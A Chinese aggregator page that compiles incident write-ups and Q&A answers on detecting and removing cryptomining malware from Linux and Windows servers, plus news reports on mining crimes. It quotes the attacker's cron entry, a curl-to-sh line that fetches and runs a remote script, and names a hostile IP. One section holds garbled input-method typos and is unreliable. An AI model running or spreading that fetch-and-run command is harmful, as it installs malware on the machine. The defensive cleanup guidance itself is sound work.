本资讯是关于求助服务器被挖矿程序入侵如何排查,如何查看电脑是否被植入了挖矿程序,电脑挖矿违法吗,阿里云服务器被挖矿了怎么办(纯纯电脑小白相关的内容,由数字区块链为您收集整理请点击查看详情
1. 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL https://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,https://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发“real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
2. windows服务器的挖矿进程怎么关闭删除
这种病毒腾讯安全提到过
可以去下载安装一个腾讯御点
打开之后,使用里面的病毒查杀功能,直接就可以查杀这种电脑病毒了
3. 服务器被检测出挖矿
有位朋友说,他服务器使用的好好的,服务商突然封了他服务器,说是被检测出挖矿,这位朋友一脸懵“我开游戏的,挖什么矿”。突然地关停服务器导致这位朋友损失惨重,那么为什么会被检测出挖矿,以及怎么处理呢?感兴趣的话就继续往下看吧~
遇到以上问题,需要先找服务器商对其说明实际情况,配合他们排查,基本上就是中了挖矿病毒。
最简单的方法就是重装系统,但是系统盘数据都会清空,这种办法适用于服务器里没什么需要备份的文件。如果选择重装系统,需要把自己的文件扫毒一遍确认安全后再导入服务器。
但是服务器里如果有很多重要的文件还有比较难配置的环境,那就需要排查删除挖矿程序,全盘扫毒,删除可疑文件,一个个修复病毒对系统的修改。
防范建议:
1.尽量不要使用默认密码和端口,改一个比较复杂的密码
2.可以使用宝塔面板登陆服务器
3.系统自带的防火墙、安全防护都不要关闭
4. 服务器被攻击并植入kdevtmpfsi挖矿/病毒/木马
MongoDB库中的数据莫名其妙没有了,发觉如下信息:
1、 top -d 5命令 ,查看系统负载情况、是否有未知进程,发现一个名为kdevtmpfsi的进程,经科普它是一个挖矿程序,会占用服务器高额的CPU、内存资源。如图,CPU占用率高达788.7%,而且是yarn用户下:
2、 ps -ef |grep kdevtmpfsi 命令查看 该挖矿程序路径:/tmp/kdevtmpfsi
3、 ps -ef |grep yarn 命令查看更多关于yarn相关进程信息(此时我的服务器并没有开启yarn服务,如果有yarn的相关进程则可判断是攻击者开启的进程),发现另外还有个kinsing进程,经科普kinsing进程是kdevtmpfsi的守护进程:
4、 netstat -lntupaa 命令查看是否有异常的ip,果然发现194.87.102.77这个陌生的ip,判断是kdevtmpfsi的发出者:
5、经查询该ip的所在国家是俄罗斯:
6、 find / -iname kdevtmpfsi 命令再次确定命令所在位置以便删除:
7、 cd /tmp 进入相关目录:
8、 rm -rf kdevtmpfsi 删除kdevtmpfsi程序:
9、** kill -9 40422**杀掉kdevtmpfsi进程:
10、发现并没杀掉所有kdevtmpfsi进程,再次查找yarn的相关进程(因为之前已确认病毒是在yarn下),果真还有kdevtmpfsi进程存在:
11、用命令 批量杀掉 相关进程:
12、删除kinsing文件:
13、现在,已经把挖矿程序及相关进程删除掉了,但是还有两处没做处理:
14、 crontab -l 命令先看看crontab的定时任务列表吧:
15、编写删除挖矿程序脚本 kill_kdevtmpfsi.sh :
16、新增 定时任务 并删除攻击者的挖矿定时任务:
17、 crontab -l命令 查看现在只有杀进程的定时任务了:
18、禁止黑客的IP地址。
最初安装MongoDB时,并未设置密码认证,存在漏洞,导致黑客通过漏洞攻击服务器,并在程序里植入木马/病毒。单纯的kill -9 id杀掉病毒进程是杀不彻底的,治标不治本,应该定时删除病毒进程,禁止攻击者IP,重新安装系统或相关软件。
经过几天的观察,服务器运行正常,再没有被黑客攻击成功。
5. 求助服务器被挖矿程序入侵,如何排查
新客户于最近向我们SINE安全公司咨询,说他的服务器经常卡的网站无法打开,远程连接
服务器的慢的要命,有时候PING值都达到300-500之间,还经常掉包,听客户这么一说,一般
会判断为受到了CC+DDOS混合流量攻击,再具体一问,说是机房那面没有受到流量攻击,这
就有点奇怪了,不是流量攻击,还导致服务器卡,网站无法打开,这是什么攻击?为了解决客
户服务器卡的问题,我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。
挖矿木马还设计了挖矿进程如果被客户强制停止后,会自动启动继续挖矿,达到不间断的挖矿,
仔细检查发现是通过设置了每个小时执行任务计划,远程下载shell挖矿木马,然后执行,检查
当前进程是否存在,不存在就启动挖矿木马,进行挖矿。
对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据,以及感染蠕虫的病
毒,如果数据被加密那损失大了,客户是做平台的,里面的客户数据很重要,找出挖矿木马后,
客户需要知道服务器到底是如何被攻击的? 被上传挖矿木马的? 防止后期再出现这样的攻击
状况。
通过我们安全工程师的安全检测与分析,发现该服务器使用的是apache tomcat环境,平台的开
发架构是JSP+oracle数据库,apache tomcat使用的是2016年的版本,导致该apache存在严重
的远程执行命令漏洞,入侵者可以通过该漏洞直接入侵服务器,拿到服务器的管理员权限,
SINE安全工程师立即对apache 漏洞进行修复,并清除木马,至此问题得以解决,客户服务器
一切稳定运行,网站打开正常。
6. 如何查看电脑是否被植入了挖矿程序
如何判断自己的电脑是否被挖矿,怎样预防?
电脑开机后,所有程序都不打开的情况下。按Ctrl+ALT+Del调出任务管理器,在“进程”卡项中,查看CPU的使用情况。如果看到某个进程占用了大量的cpu使用情况,并且几分钟后都没有降低的趋势,这个程序就可能是病毒了。
想要预防自己的电脑被挖矿也很简单,只要安装正规的安全软件,使用安全的浏览器,添加安全合适的插件,就可以防止电脑被挖矿了。
当然,如果不浏览不正规不健康的网站,不下载盗版游戏,盗版软件等就更能从根源杜绝电脑被不法分子挖矿的风险。
7. 新买的云服务器提示挖矿
利用云电脑的计算资源执行挖矿的持续性程序,
已停止是服务绝大数都是正常的。这些已停止表示你已经禁用或停止了相关的服务,但停止不是卸载,所以它们仍然存在是正常的,每台电脑里都有许多已停止的差念服务,不用担心。你真正要担心的是360那个提示,可在任务管理器中查着虚兄困活动进程,若某进程CPU或内存占用高,而你又不明确该进程是尘肢干嘛的,可以先结束进程再看看360还会不会提醒!
8. 电脑挖矿违法吗
正常用着的电脑,却被非法控制,替别人“干活”,用户却浑然不知。原来,电脑被植入了挖矿程序及挖矿监控程序,监控程序只要监测到电脑CPU利用率低于50%,挖矿程序就会在后台静默启动,通过大量耗费被控电脑的CPU、GPU资源和电力资源,持续不断地挖取虚拟货币,并将这些虚拟货币转至控制者处,从而提现牟取暴利。
近期,潍坊市公安局网安支队会同青州市公安局在公安部、省公安厅指导下,在腾讯守护者计划安全团队协助下,按照公安部和省公安厅“净网2018专项行动”部署要求,成功破获部督“1.03”特大非法控制计算机信息系统案,目前抓获犯罪嫌疑人20名,取保候审11名,批捕9名。
经查,大连升平网络科技有限公司研发挖矿监控软件、集成挖矿程序后,通过发展下线代理,非法控制了全国389余万台电脑主机做广告增值收益,在100多万台电脑主机静默安装挖矿程序。两年期间共挖取DGB币(“极特币”)、DCR币(“德赛币”)、SC(“云产币”)币2600余万枚,共非法获利1500余万元。
据了解,虽然非法控制计算机信息系统的违法犯罪屡见不鲜,但是数量达到如此之巨,而且通过植入静默挖矿程序这种新型手段,进行虚拟货币变现,这在全国是比较少见的。
游戏外挂暗藏挖矿木马程序
2018年1月3日,潍坊市公安局网安支队接腾讯守护者计划安全团队报案称,腾讯电脑管家检测到一款游戏外挂暗藏了一款木马程序,该木马程序具备后台静默挖矿功能。
“挖矿,就是通过大量计算机运算获取数字货币-虚拟货币奖励,这个过程对电脑硬件配置要求比较高,主机经常长期高负荷运转,显卡、主板、内存等硬件会提前报废,对电脑的损害极大。”办案民警介绍。
办案民警说,违法犯罪人员通常提前调研市面上挖取难度较低的虚拟货币,通过云计算、显卡云计算业务非法控制用户的电脑主机,植入这种虚拟货币的挖矿程序进行挖矿,用户对此毫无察觉,只要电脑处于开机状态,挖矿程序就在后台静默运转,在挖取到大量矿币后迅速转至控制者那里变现提现,牟取高额利润。
初步统计,该木马程序感染数十万台用户机器。潍坊市公安局网安支队接案后,迅速研判案件线索,通过互联网提取到外挂木马样本,找到木马开发者建立的木马交流群,初步落查发现该款木马程序开发者在青州市。市局网安支队将该案情通报青州市公安局,由市局网安支队、青州市局成立专案组,对该案立案侦查。
专案组确定交流群群主身份为杨某宝。通过侦查发现,杨某宝一是建立了多个外挂讨论群,在群文件中共享外挂程序;二是利用“天下网吧论坛”版主的身份,将上传含有木马的外挂程序到“天下网吧”论坛供网民下载;三是通过网络网盘进行分享下载。
3月8日,专案组制定了详细的抓捕方案,在家中将杨某宝抓获。
9. top cpu飙高,中了挖矿程序----解决方法
1.发现cpu异常,查看对应的进程信息
2.查看进程发现是挖矿进程在执行
3.确定是挖矿病毒,查看进程的执行文件链接到哪里,发现是jenkins的工作目录,最后结果发现是jenkins的漏洞导致自动创建CI计划,进行启动挖矿脚本
4.查看虚机密码是否被破解登录
5.查找挖矿文件
6.检查定时任务脚本
jenkins CVE-2018-1999002 漏洞修复: https://paper.seebug.org/648/
jenkings漏洞利用: https://xz.aliyun.com/t/4756
CI安全隐患: https://www.jianshu.com/p/8939aaec5f25
jenkins漏洞描述地址: https://www.cyberark.com/threat-research-blog/tripping-the-jenkins-main-security-circuit-breaker-an-inside-look-at-two-jenkins-security-vulnerabilities/
10. 蔚来员工利用公司服务器挖矿,这一行为是否违法
蔚来员工利用职务之便,从2021年2月开始使用公司服务器进行挖矿,从中获取利益,这个行为明显已经触犯了我国的相关法律。
其实利用公司资源进行非法挖矿行为早有先例,在2018年1月到5月期间,网络一个运维员工就曾经在网络公司服务器上安装挖矿程序,通过公司的资源谋取暴利,之后将挖矿所得的虚拟货币卖出,从中获得10万元人民币,后来,在网络公司的追查下,这名员工才被发现,并且因涉嫌非法控制计算机信息系统罪被判有期徒刑三年,并处罚金1.1万元,扣押违法所得10万元整。
而对于挖矿这个行为,国家是坚决打击的,目前相关的省份也出台了相关的文件,表面上只是提高了挖矿公司的电费,实际上是为了让从事挖矿的人员知难而退,因为电费一旦上涨,那么相对应的挖矿成本也就增加了。
综上所述,该蔚来员工利用职务之便进行挖矿行为,已经涉嫌非法控制计算机信息系统罪,所以,他极有可能会因为此罪名而被起诉。
免责声明:
本文观点仅代表作者个人观点,不构成本平台的投资建议,本平台不对文章信息准确性、完整性和及时性作出任何保证,亦不对因使用或信赖文章信息引发的任何损失承担责任
0.00